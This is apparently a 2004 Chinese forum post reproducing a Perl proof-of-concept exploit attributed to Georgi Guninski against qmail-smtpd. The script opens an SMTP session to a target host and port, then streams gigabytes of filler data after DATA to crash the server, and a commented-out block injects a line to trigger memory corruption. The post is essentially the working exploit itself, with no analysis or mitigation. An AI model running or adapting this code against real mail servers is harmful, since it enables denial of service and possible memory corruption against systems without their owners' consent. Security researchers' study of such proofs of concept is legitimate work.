|
楼主 |
发表于 2004-2-18 13:23:22
|
显示全部楼层
- ---qma4.pl----
- #!/usr/bin/perl -w
- #Copyright Georgi Guninski\nCannot be used in vulnerability databases and
- #similar stuff
- use IO::Socket;
- my $port = $ARGV[1];
- my $host = $ARGV[0];
- my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || die "socket";
- my $req = "HELO a\r\n";
- my $fromaddr="they\@sux.org";
- my $touser="postmaster";
- print "qmail-smtpd SEGV. Copyright Georgi Guninski\nCannot be used in vulnerability databases and similar stuff\nWill connect to ${host}:${port} fromaddr=${fromaddr} touser=${touser}\n";
- $req .= "MAIL FROM: ${fromaddr}\r\n";
- $req .= "RCPT TO: ${touser}\r\n";
- $req .= "DATA\r\n";
- $req .= "1234567890";
- #my $x = "\ng" x 100;
- #print $x;
- syswrite($socket,$req,length($req));
- my $l1= 1024*1024;
- my $p1 = "gg" x $l1;
- my $pl = 2*$l1;
- print "length=${pl}\n";
- my $towrite = $l1*2050;
- my $wri = 0;
- $req = $p1;
- while ($wri < $towrite)
- {
- syswrite($socket,$req,$pl);
- if ( ($wri % $l1) == 0) {print "written=" . $wri/$l1 . "\n";}
- # !!! uncomment the following lines to get qmail memory screw on linux according to gdb
- #if ($wri/$l1 == 2044)
- #{
- #syswrite($socket,"g\r\n",3);print "injected\n";
- #};
- $wri += $pl;
- }
- $req = "test\r\n";
- $req .= ".\r\n";
- syswrite($socket,$req,length($req));
- while(< $socket>)
- {
- print $_;
- }
- close $socket;
复制代码 |
|